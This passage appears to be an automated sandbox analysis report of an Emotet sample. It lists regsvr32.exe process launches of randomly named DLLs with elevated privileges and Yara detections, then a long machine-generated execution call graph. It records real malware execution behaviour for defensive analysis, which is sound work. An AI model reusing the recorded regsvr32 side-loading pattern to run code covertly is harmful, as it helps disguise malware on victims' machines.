                                                                              Start time:08:54:14
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                                                                              Imagebase:0x7ff7c1920000
                                                                              File size:24064 bytes
                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              Target ID:4
                                                                              Start time:08:54:19
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"
                                                                              Imagebase:0x7ff7c1920000
                                                                              File size:24064 bytes
                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              Target ID:8
                                                                              Start time:08:54:30
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:9
                                                                              Start time:08:54:44
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:10
                                                                              Start time:08:54:45
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:11
                                                                              Start time:08:54:50
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:16
                                                                              Start time:08:55:28
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:18
                                                                              Start time:08:55:46
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                                Execution Graph

                                                                                Execution Coverage:7.7%
                                                                                Dynamic/Decrypted Code Coverage:2.6%
                                                                                Signature Coverage:5.4%
                                                                                Total number of Nodes:1881
                                                                                Total number of Limit Nodes:45
17691->17689 18201 7ffa52474920 18204 7ffa5247d530 18201->18204 18207 7ffa5247d580 18204->18207 18208 7ffa5247d59a std::exception::_Tidy 18207->18208 18209 7ffa5247493d 18207->18209 18208->18209 18210 7ffa5247d660 std::exception::_Copy_str 17 API calls 18208->18210 18210->18209 16646 7ffa5246461b 16649 7ffa52464625 _calloc_dbg_impl 16646->16649 16648 7ffa524648be 16650 7ffa52469360 LeaveCriticalSection 16649->16650 16650->16648 16993 7ffa52469328 16994 7ffa52469336 EnterCriticalSection 16993->16994 16995 7ffa5246932c 16993->16995 16995->16994 17692 7ffa5247e424 17693 7ffa5247e469 _CrtMemDumpAllObjectsSince 17692->17693 17694 7ffa5247e588 DecodePointer 17693->17694 17695 7ffa5247e5fd _CrtMemDumpAllObjectsSince 17694->17695 17696 7ffa5247e642 _CrtMemDumpAllObjectsSince 17695->17696 17697 7ffa5247e61b DecodePointer 17695->17697 17698 7ffa5247e666 DecodePointer 17696->17698 17700 7ffa5247e68d std::exception::_Copy_str 17696->17700 17697->17696 17698->17700 17699 7ffa5247eadf 17702 7ffa5247ef10 25 API calls 17699->17702 17700->17699 17701 7ffa5247eec0 25 API calls 17700->17701 17710 7ffa5247da75 17700->17710 17701->17699 17703 7ffa5247eafd 17702->17703 17704 7ffa5247eb33 17703->17704 17707 7ffa5247eec0 25 API calls 17703->17707 17705 7ffa5247ec29 17704->17705 17719 7ffa5247eb49 _CrtMemDumpAllObjectsSince 17704->17719 17708 7ffa5247ebda 17705->17708 17709 7ffa5247ef10 25 API calls 17705->17709 17706 7ffa5247eca1 17712 7ffa5246bd70 _invalid_parameter 17 API calls 17706->17712 17714 7ffa5247dbe9 _LocaleUpdate::~_LocaleUpdate 17706->17714 17707->17704 17708->17710 17711 7ffa5247eec0 25 API calls 17708->17711 17709->17708 17710->17706 17713 7ffa5247dbb5 17710->17713 17711->17710 17712->17714 17717 7ffa5246bd70 _invalid_parameter 17 API calls 17713->17717 17715 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17714->17715 17716 7ffa5247ed9e 17715->17716 17717->17714 17718 7ffa5247f000 wcsxfrm 2 API calls 17718->17719 17719->17708 17719->17718 17720 7ffa5247ee40 25 API 
calls 17719->17720 17720->17719 18646 7ffa52465a25 18647 7ffa52465a37 18646->18647 18648 7ffa5246bd70 _invalid_parameter 17 API calls 18647->18648 18649 7ffa52465aaf 18648->18649 17725 7ffa524633d6 17728 7ffa524688d0 HeapDestroy 17725->17728 17727 7ffa524633db 17728->17727 16996 7ffa52465ad9 16997 7ffa52465add 16996->16997 17002 7ffa52466380 16997->17002 16999 7ffa52465b3a 17006 7ffa52469360 LeaveCriticalSection 16999->17006 17001 7ffa52465c14 17003 7ffa52466395 _CrtIsValidPointer 17002->17003 17005 7ffa52466391 17002->17005 17004 7ffa524663b6 HeapValidate 17003->17004 17003->17005 17004->17005 17005->16999 17006->17001 18215 7ffa524634d5 18216 7ffa524634da _calloc_dbg 18215->18216 18217 7ffa5246350b FlsSetValue 18216->18217 18221 7ffa52463548 18216->18221 18218 7ffa52463520 18217->18218 18217->18221 18219 7ffa52463e30 LeaveCriticalSection 18218->18219 18220 7ffa5246352c GetCurrentThreadId 18219->18220 18220->18221 17018 7ffa524776c0 17019 7ffa524776cf _CrtMemDumpAllObjectsSince 17018->17019 17020 7ffa52477be3 _CrtMemDumpAllObjectsSince 17018->17020 17022 7ffa52477905 _CrtMemDumpAllObjectsSince 17019->17022 17023 7ffa524777f5 _CrtMemDumpAllObjectsSince wcsncnt 17019->17023 17032 7ffa524776e6 _LocaleUpdate::~_LocaleUpdate 17019->17032 17021 7ffa52477cc6 WideCharToMultiByte 17020->17021 17020->17032 17021->17032 17025 7ffa5247790f WideCharToMultiByte 17022->17025 17028 7ffa52477827 WideCharToMultiByte 17023->17028 17024 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17026 7ffa52477d85 17024->17026 17027 7ffa52477965 17025->17027 17029 7ffa5247799a GetLastError 17027->17029 17027->17032 17028->17032 17031 7ffa524779d3 _CrtMemDumpAllObjectsSince 17029->17031 17029->17032 17030 7ffa52477a05 WideCharToMultiByte 17030->17031 17030->17032 17031->17030 17031->17032 17032->17024 18222 7ffa5247bcbd 18224 7ffa5247b99c 18222->18224 18223 7ffa5247cc93 18225 7ffa5246bd70 _invalid_parameter 17 API calls 18223->18225 18226 7ffa5247bb0e _LocaleUpdate::~_LocaleUpdate 
18223->18226 18224->18223 18227 7ffa5247bada 18224->18227 18225->18226 18228 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18226->18228 18230 7ffa5246bd70 _invalid_parameter 17 API calls 18227->18230 18229 7ffa5247cd90 18228->18229 18230->18226 17737 7ffa52479fba 17747 7ffa52479c4d 17737->17747 17738 7ffa5247a06d WriteFile 17739 7ffa5247a103 GetLastError 17738->17739 17738->17747 17744 7ffa52479dd9 _dosmaperr __doserrno 17739->17744 17740 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17741 7ffa5247a9f5 17740->17741 17742 7ffa52479f66 WideCharToMultiByte 17743 7ffa52479fbf WriteFile 17742->17743 17742->17744 17746 7ffa5247a050 GetLastError 17743->17746 17743->17747 17744->17740 17745 7ffa5247fc00 WriteConsoleW CreateFileW _putwch_nolock 17745->17747 17746->17744 17747->17738 17747->17742 17747->17744 17747->17745 17748 7ffa5247a158 GetLastError 17747->17748 17749 7ffa5247f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 17747->17749 17750 7ffa5247a1b5 GetLastError 17747->17750 17748->17744 17749->17747 17750->17744 18231 7ffa524668c4 18232 7ffa524668d1 18231->18232 18233 7ffa52466ba6 18232->18233 18236 7ffa524668ed _CrtIsValidPointer 18232->18236 18249 7ffa52469360 LeaveCriticalSection 18233->18249 18235 7ffa52466bb0 18237 7ffa5246695e IsBadReadPtr 18236->18237 18238 7ffa52466976 18236->18238 18247 7ffa5246692f 18236->18247 18237->18238 18239 7ffa52466ad2 18238->18239 18240 7ffa52466a29 18238->18240 18241 7ffa52466b2d 18239->18241 18242 7ffa52466add 18239->18242 18243 7ffa52466abe 18240->18243 18244 7ffa52466a86 IsBadReadPtr 18240->18244 18241->18247 18248 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18241->18248 18246 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18242->18246 18245 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18243->18245 18244->18243 18244->18247 18245->18247 18246->18247 18248->18247 18249->18235 17751 7ffa5246f7f1 17752 7ffa5246f80d 17751->17752 17769 7ffa5246f8de _wcsftime_l 
17751->17769 17808 7ffa52476fb0 17752->17808 17755 7ffa5246fa70 17815 7ffa524769c0 17755->17815 17756 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17759 7ffa5246f85a OutputDebugStringA 17756->17759 17758 7ffa5246f9f4 17758->17755 17761 7ffa5246d490 std::exception::_Copy_str 17 API calls 17758->17761 17762 7ffa5246f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17759->17762 17760 7ffa5246fa8a 17763 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17760->17763 17764 7ffa5246fa43 17761->17764 17807 7ffa5246f8ce 17762->17807 17766 7ffa5246fab7 17763->17766 17767 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17764->17767 17768 7ffa5246fb24 17766->17768 17770 7ffa524769c0 17 API calls 17766->17770 17783 7ffa5246fb6a 17766->17783 17767->17755 17771 7ffa524769c0 17 API calls 17768->17771 17769->17758 17776 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 17769->17776 17777 7ffa5246f996 17769->17777 17773 7ffa5246faf7 17770->17773 17772 7ffa5246fb3d 17771->17772 17774 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17772->17774 17778 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17773->17778 17774->17783 17775 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17779 7ffa5247011d 17775->17779 17776->17777 17777->17758 17780 7ffa5246d490 std::exception::_Copy_str 17 API calls 17777->17780 17778->17768 17781 7ffa5246f9c7 17780->17781 17782 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17781->17782 17782->17758 17784 7ffa5246fc39 17783->17784 17786 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 17783->17786 17785 7ffa5246fc97 17784->17785 17787 7ffa5246d490 std::exception::_Copy_str 17 API calls 17784->17787 17828 7ffa52476970 17785->17828 17786->17784 17788 7ffa5246fc6a 17787->17788 17790 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17788->17790 17790->17785 17792 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 17793 7ffa5246fd6e 17792->17793 17794 7ffa52471640 17 API calls 17793->17794 17803 7ffa5246fdbb 
17793->17803 17795 7ffa5246fd8e 17794->17795 17796 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17795->17796 17796->17803 17797 7ffa5246ffef 17798 7ffa52470008 OutputDebugStringA 17797->17798 17799 7ffa52470016 17797->17799 17798->17799 17804 7ffa52476fb0 _itow_s 17 API calls 17799->17804 17799->17807 17801 7ffa5246ff03 std::exception::_Copy_str 17801->17797 17802 7ffa5246ffaa WriteFile 17801->17802 17801->17807 17802->17797 17803->17801 17831 7ffa52469360 LeaveCriticalSection 17803->17831 17805 7ffa52470065 17804->17805 17806 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17805->17806 17806->17807 17807->17775 17809 7ffa52476fd6 17808->17809 17810 7ffa52477003 17808->17810 17809->17810 17811 7ffa52476fdd 17809->17811 17812 7ffa52477030 _itow_s 17 API calls 17810->17812 17832 7ffa52477030 17811->17832 17814 7ffa5246f82d 17812->17814 17814->17756 17817 7ffa524769e1 17815->17817 17816 7ffa52476a42 17818 7ffa5246bd70 _invalid_parameter 17 API calls 17816->17818 17817->17816 17819 7ffa52476a80 _calloc_dbg_impl 17817->17819 17823 7ffa52476a76 _calloc_dbg_impl 17818->17823 17820 7ffa52476b6e 17819->17820 17821 7ffa52476bac _calloc_dbg_impl 17819->17821 17824 7ffa5246bd70 _invalid_parameter 17 API calls 17820->17824 17822 7ffa52476ce8 17821->17822 17825 7ffa52476d26 _calloc_dbg_impl 17821->17825 17826 7ffa5246bd70 _invalid_parameter 17 API calls 17822->17826 17823->17760 17824->17823 17825->17823 17827 7ffa5246bd70 _invalid_parameter 17 API calls 17825->17827 17826->17823 17827->17823 17848 7ffa524763e0 17828->17848 17830 7ffa5246fd20 17830->17792 17831->17801 17833 7ffa52477055 17832->17833 17834 7ffa524770ab 17833->17834 17837 7ffa524770e9 17833->17837 17835 7ffa5246bd70 _invalid_parameter 17 API calls 17834->17835 17845 7ffa524770df 17835->17845 17836 7ffa5247714a 17838 7ffa5246bd70 _invalid_parameter 17 API calls 17836->17838 17837->17836 17840 7ffa52477188 _calloc_dbg_impl 17837->17840 17838->17845 17839 7ffa52477287 17841 7ffa5246bd70 _invalid_parameter 17 
API calls 17839->17841 17840->17839 17842 7ffa524772c5 17840->17842 17841->17845 17843 7ffa52477338 17842->17843 17846 7ffa52477376 17842->17846 17844 7ffa5246bd70 _invalid_parameter 17 API calls 17843->17844 17844->17845 17845->17814 17846->17845 17847 7ffa5246bd70 _invalid_parameter 17 API calls 17846->17847 17847->17845 17850 7ffa5247640e 17848->17850 17849 7ffa5247648e 17851 7ffa5246bd70 _invalid_parameter 17 API calls 17849->17851 17850->17849 17852 7ffa524764cc _calloc_dbg_impl 17850->17852 17859 7ffa524764c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17851->17859 17853 7ffa5247668e _CrtMemDumpAllObjectsSince 17852->17853 17854 7ffa5247663f 17852->17854 17860 7ffa52475ea0 17853->17860 17856 7ffa5246bd70 _invalid_parameter 17 API calls 17854->17856 17856->17859 17857 7ffa524766b5 _calloc_dbg_impl 17858 7ffa5246bd70 _invalid_parameter 17 API calls 17857->17858 17857->17859 17858->17859 17859->17830 17861 7ffa52475ecf 17860->17861 17862 7ffa52475fae 17861->17862 17863 7ffa52475f6e 17861->17863 17872 7ffa52475eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17861->17872 17865 7ffa524762e1 _CrtMemDumpAllObjectsSince 17862->17865 17866 7ffa52475fcf _CrtMemDumpAllObjectsSince 17862->17866 17864 7ffa5246bd70 _invalid_parameter 17 API calls 17863->17864 17864->17872 17867 7ffa5247632f MultiByteToWideChar 17865->17867 17865->17872 17868 7ffa524760a1 MultiByteToWideChar 17866->17868 17866->17872 17867->17872 17869 7ffa5247610e GetLastError 17868->17869 17868->17872 17870 7ffa52476154 _CrtMemDumpAllObjectsSince wcsxfrm 17869->17870 17869->17872 17871 7ffa52476238 MultiByteToWideChar 17870->17871 17870->17872 17871->17872 17872->17857 18254 7ffa524664eb 18255 7ffa524664f8 18254->18255 18258 7ffa52466504 18255->18258 18259 7ffa52469360 LeaveCriticalSection 18255->18259 18257 7ffa52466655 18259->18257 17075 7ffa52479aeb 17076 7ffa52479b2c 17075->17076 17077 7ffa52479b18 17075->17077 17079 7ffa5247ab10 17 API calls 17076->17079 17078 7ffa52479520 19 API calls 
17077->17078 17078->17076 17082 7ffa52479b38 17079->17082 17080 7ffa52479c04 17081 7ffa5247a1cb 17080->17081 17085 7ffa52479c23 GetConsoleCP 17080->17085 17083 7ffa5247a8ad WriteFile 17081->17083 17084 7ffa5247a205 17081->17084 17082->17080 17089 7ffa52479bae GetConsoleMode 17082->17089 17087 7ffa5247a923 GetLastError 17083->17087 17091 7ffa52479dd9 _dosmaperr __doserrno 17083->17091 17086 7ffa5247a400 17084->17086 17090 7ffa5247a21a 17084->17090 17093 7ffa52479c4d 17085->17093 17088 7ffa5247a5f3 17086->17088 17105 7ffa5247a40e 17086->17105 17087->17091 17088->17091 17099 7ffa5247a726 WideCharToMultiByte 17088->17099 17103 7ffa5247a7b0 WriteFile 17088->17103 17089->17080 17090->17091 17094 7ffa5247a33e WriteFile 17090->17094 17092 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17091->17092 17096 7ffa5247a9f5 17092->17096 17093->17091 17098 7ffa52479f66 WideCharToMultiByte 17093->17098 17104 7ffa5247fc00 WriteConsoleW CreateFileW _putwch_nolock 17093->17104 17108 7ffa5247a158 GetLastError 17093->17108 17109 7ffa5247f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 17093->17109 17110 7ffa5247a06d WriteFile 17093->17110 17112 7ffa5247a1b5 GetLastError 17093->17112 17094->17090 17095 7ffa5247a3ea GetLastError 17094->17095 17095->17091 17097 7ffa5247a531 WriteFile 17100 7ffa5247a5dd GetLastError 17097->17100 17097->17105 17098->17091 17101 7ffa52479fbf WriteFile 17098->17101 17099->17088 17102 7ffa5247a791 GetLastError 17099->17102 17100->17091 17101->17093 17106 7ffa5247a050 GetLastError 17101->17106 17102->17091 17103->17088 17107 7ffa5247a857 GetLastError 17103->17107 17104->17093 17105->17091 17105->17097 17106->17091 17107->17088 17108->17091 17109->17093 17110->17093 17111 7ffa5247a103 GetLastError 17110->17111 17111->17091 17112->17091 18260 7ffa5246d0ea 18261 7ffa5246d0ef 18260->18261 18262 7ffa52467090 _exit 33 API calls 18261->18262 18263 7ffa5246d209 18261->18263 18267 7ffa5246d0fc 18261->18267 18262->18263 18265 7ffa5246d289 18263->18265 18268 
7ffa52463d00 RtlEncodePointer 18263->18268 18265->18267 18269 7ffa52469360 LeaveCriticalSection 18265->18269 18268->18265 18269->18267 18650 7ffa524691ea 18651 7ffa524691ef 18650->18651 18652 7ffa524674e0 __crtExitProcess 3 API calls 18651->18652 18653 7ffa52469203 18652->18653 16488 7ffa52466ff2 16489 7ffa52466ffe 16488->16489 16492 7ffa5246ca00 16489->16492 16491 7ffa52467011 _initterm_e 16493 7ffa5246ca0e 16492->16493 16494 7ffa5246ca4b 16493->16494 16495 7ffa5246ca23 EncodePointer 16493->16495 16494->16491 16495->16493 18270 7ffa524748e0 18271 7ffa524748f7 std::bad_exception::~bad_exception 18270->18271 18272 7ffa5247490c 18271->18272 18273 7ffa5247d710 _Ref_count LeaveCriticalSection 18271->18273 18273->18272 18658 7ffa52475de0 18659 7ffa52463170 __GSHandlerCheck 8 API calls 18658->18659 18660 7ffa52475e34 18659->18660 18661 7ffa52475e86 18660->18661 18663 7ffa52463870 18660->18663 18664 7ffa524639db __SehTransFilter 18663->18664 18665 7ffa524638de __SehTransFilter 18663->18665 18664->18661 18665->18664 18666 7ffa52463a71 RtlUnwindEx 18665->18666 18666->18664 17873 7ffa524813e0 17876 7ffa5247aee0 17873->17876 17877 7ffa5247af47 LeaveCriticalSection 17876->17877 17878 7ffa5247aef7 17876->17878 17881 7ffa5247af45 17877->17881 17878->17877 17879 7ffa5247af0b 17878->17879 17882 7ffa52469360 LeaveCriticalSection 17879->17882 17882->17881 18274 7ffa524714e1 18275 7ffa52471520 DecodePointer 18274->18275 18276 7ffa524714ef DecodePointer 18274->18276 18277 7ffa52471540 18275->18277 18276->18275 18279 7ffa5247150f 18276->18279 18278 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18277->18278 18280 7ffa5247157a 18278->18280 18279->18275 18667 7ffa5247ade0 18672 7ffa5247fee0 18667->18672 18671 7ffa5247adf9 18673 7ffa5247ff00 _fflush_nolock 25 API calls 18672->18673 18674 7ffa5247ade9 18673->18674 18674->18671 18675 7ffa5247fc70 18674->18675 18681 7ffa5247fc86 18675->18681 18676 7ffa5247fd59 18693 7ffa52469360 LeaveCriticalSection 18676->18693 18678 7ffa5247fd63 
18678->18671 18679 7ffa5247fd09 DeleteCriticalSection 18679->18681 18681->18676 18681->18679 18682 7ffa52480580 18681->18682 18683 7ffa52480599 18682->18683 18684 7ffa524805ef 18683->18684 18685 7ffa5248062a 18683->18685 18687 7ffa5246bd70 _invalid_parameter 17 API calls 18684->18687 18689 7ffa52480623 18685->18689 18694 7ffa5247ae10 18685->18694 18687->18689 18688 7ffa52480651 18698 7ffa52480680 18688->18698 18689->18681 18691 7ffa5248065c 18692 7ffa5247aee0 2 API calls 18691->18692 18692->18689 18693->18678 18695 7ffa5247ae77 EnterCriticalSection 18694->18695 18696 7ffa5247ae27 18694->18696 18697 7ffa5247ae3b 18695->18697 18696->18695 18696->18697 18697->18688 18699 7ffa52480699 18698->18699 18700 7ffa524806ef 18699->18700 18701 7ffa5248072d 18699->18701 18705 7ffa5246bd70 _invalid_parameter 17 API calls 18700->18705 18702 7ffa52480723 18701->18702 18703 7ffa5247fdf0 _fflush_nolock 17 API calls 18701->18703 18702->18691 18704 7ffa52480752 18703->18704 18706 7ffa5247afb0 _fflush_nolock 17 API calls 18704->18706 18705->18702 18707 7ffa5248076a 18706->18707 18709 7ffa52480a20 18707->18709 18710 7ffa52480a33 __doserrno 18709->18710 18711 7ffa52480a53 18709->18711 18710->18702 18712 7ffa52480abc __doserrno 18711->18712 18718 7ffa52480b05 18711->18718 18715 7ffa5246bd70 _invalid_parameter 17 API calls 18712->18715 18713 7ffa52480b89 __doserrno 18721 7ffa5246bd70 _invalid_parameter 17 API calls 18713->18721 18714 7ffa52480bd2 18716 7ffa5247fae0 _fflush_nolock 3 API calls 18714->18716 18715->18710 18717 7ffa52480bdb 18716->18717 18720 7ffa52480c13 18717->18720 18723 7ffa52480c80 18717->18723 18718->18713 18718->18714 18736 7ffa5247fbc0 LeaveCriticalSection 18720->18736 18721->18710 18724 7ffa5247f900 _fflush_nolock 17 API calls 18723->18724 18726 7ffa52480c91 18724->18726 18725 7ffa52480d05 18737 7ffa5247f7d0 18725->18737 18726->18725 18728 7ffa5247f900 _fflush_nolock 17 API calls 18726->18728 18735 7ffa52480ce5 18726->18735 18730 7ffa52480cd6 18728->18730 18729 
7ffa5247f900 _fflush_nolock 17 API calls 18731 7ffa52480cf8 CloseHandle 18729->18731 18732 7ffa5247f900 _fflush_nolock 17 API calls 18730->18732 18731->18725 18733 7ffa52480d0f GetLastError 18731->18733 18732->18735 18733->18725 18734 7ffa52480d22 _dosmaperr 18734->18720 18735->18725 18735->18729 18736->18710 18738 7ffa5247f7e3 18737->18738 18739 7ffa5247f878 __doserrno 18737->18739 18738->18739 18740 7ffa5247f87a SetStdHandle 18738->18740 18741 7ffa5247f86a 18738->18741 18739->18734 18740->18739 18742 7ffa5247f871 18741->18742 18743 7ffa5247f889 SetStdHandle 18741->18743 18742->18739 18744 7ffa5247f898 SetStdHandle 18742->18744 18743->18739 18744->18739 16536 7ffa524635e1 16538 7ffa524635f1 16536->16538 16541 7ffa524635ea 16536->16541 16538->16541 16542 7ffa524612b0 16538->16542 16540 7ffa524612b0 14 API calls 16540->16541 16543 7ffa524612de CoLoadLibrary 16542->16543 16548 7ffa52462f8c 16542->16548 16545 7ffa52462f0f MessageBoxA ExitProcess 16543->16545 16546 7ffa52462f2e VirtualAlloc RtlAllocateHeap 16543->16546 16544 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16547 7ffa524630ff 16544->16547 16546->16548 16549 7ffa52462f73 _calloc_dbg_impl 16546->16549 16547->16540 16547->16541 16548->16544 16550 7ffa52462f83 RtlDeleteBoundaryDescriptor 16549->16550 16550->16548 17886 7ffa52463fe1 17887 7ffa52463fea SetLastError 17886->17887 16625 7ffa52467de0 16626 7ffa52467ded 16625->16626 16628 7ffa52467df2 std::exception::_Copy_str _calloc_dbg 16625->16628 16627 7ffa5246aa40 __initmbctable 24 API calls 16626->16627 16627->16628 16629 7ffa52467e0e 16628->16629 16632 7ffa5246d490 16628->16632 16642 7ffa52467ff0 16628->16642 16634 7ffa5246d4b1 16632->16634 16633 7ffa5246d512 16635 7ffa5246bd70 _invalid_parameter 17 API calls 16633->16635 16634->16633 16638 7ffa5246d550 _calloc_dbg_impl 16634->16638 16636 7ffa5246d546 _calloc_dbg_impl 16635->16636 16636->16628 16637 7ffa5246d67c _calloc_dbg_impl 16637->16636 16641 7ffa5246bd70 _invalid_parameter 17 API calls 
16637->16641 16638->16637 16639 7ffa5246d63e 16638->16639 16640 7ffa5246bd70 _invalid_parameter 17 API calls 16639->16640 16640->16636 16641->16636 16643 7ffa5246800e 16642->16643 16644 7ffa52468010 16642->16644 16643->16628 16645 7ffa5246be00 _invoke_watson_if_oneof 16 API calls 16644->16645 16645->16643 17888 7ffa5247bfde 17889 7ffa5247c00c 17888->17889 17890 7ffa5247b99c 17889->17890 17892 7ffa5247b530 wctomb_s 19 API calls 17889->17892 17891 7ffa5247cc93 17890->17891 17895 7ffa5247bada 17890->17895 17893 7ffa5246bd70 _invalid_parameter 17 API calls 17891->17893 17894 7ffa5247bb0e _LocaleUpdate::~_LocaleUpdate 17891->17894 17892->17889 17893->17894 17896 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17894->17896 17898 7ffa5246bd70 _invalid_parameter 17 API calls 17895->17898 17897 7ffa5247cd90 17896->17897 17898->17894 17174 7ffa524666da 17175 7ffa52466745 17174->17175 17176 7ffa52466725 17174->17176 17177 7ffa5246677f 17175->17177 17179 7ffa52469b10 __updatetmbcinfo LeaveCriticalSection 17175->17179 17176->17175 17180 7ffa52469a70 17176->17180 17179->17177 17181 7ffa52469a79 _updatetlocinfoEx_nolock 17180->17181 17182 7ffa52469ad8 17181->17182 17184 7ffa52469360 LeaveCriticalSection 17181->17184 17182->17175 17184->17182 17899 7ffa5246c7e9 17900 7ffa5246c90c EncodePointer EncodePointer 17899->17900 17901 7ffa5246c80d 17899->17901 17903 7ffa5246c8ca 17900->17903 17902 7ffa5246c872 17901->17902 17908 7ffa52464a00 17901->17908 17902->17903 17905 7ffa52464a00 _realloc_dbg 30 API calls 17902->17905 17907 7ffa5246c8ce EncodePointer 17902->17907 17906 7ffa5246c8bd 17905->17906 17906->17903 17906->17907 17907->17900 17909 7ffa52464a22 17908->17909 17914 7ffa52464a70 17909->17914 17911 7ffa52464a4c 17925 7ffa52469360 LeaveCriticalSection 17911->17925 17913 7ffa52464a5b 17913->17902 17915 7ffa52464aae _calloc_dbg_impl 17914->17915 17917 7ffa52464ad4 _realloc_dbg 17914->17917 17915->17911 17916 7ffa52466380 _CrtIsValidHeapPointer HeapValidate 17918 7ffa52464e2c 
